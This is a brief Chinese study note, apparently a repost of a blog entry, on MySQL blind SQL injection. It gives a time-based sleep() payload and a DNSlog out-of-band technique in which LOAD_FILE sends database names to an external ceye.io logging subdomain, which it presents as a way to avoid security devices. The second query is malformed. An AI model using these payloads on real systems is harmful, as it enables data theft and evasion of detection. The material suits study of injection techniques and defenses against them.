标签:语句 LOAD dnslog 测试 io 渗透 day4 ceye mysql
时间盲注
原理:构造语句,通过页面响应的时长,来判断信息。
方法:构造逻辑语句,通过条件语句进行判断,为真则立即执行,否则延时执行
核心语法:
if(left(user(),1)='a',0,sleep(3));
Dnslog盲注
dnslog是用户访问网站过程中被dns服务记录的信息
原理: 通过布尔或时间盲注效率很低,需要发送很多的请求进行判断,很可能触发安全设备的防护,我们需要一种方式,减少请求,直接回显数据,这里就使用dnslog实现注入。
dnslog平台 :http://ceye.io/
mysql LOAD_FILE函数可以发起请求:
SELECT LOAD_FILE(CONCAT('\\\\','test','.mysql.d1egqb.ceye.io\\abc'));
方法:
构造语句,利用load_file()函数发起请求,使用dnslog接受请求,获取数据
核心语法:
SELECT LOAD_FILE(CONCAT('\\\\',select database()),'.mysql.d1egqb.ceye.io\\abc'));
load_file()函数只能在windows操作系统上使用,linux操作系统不能使用
标签:语句,LOAD,dnslog,测试,io,渗透,day4,ceye,mysql 来源: https://www.cnblogs.com/liuyuanzzz/p/11679925.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。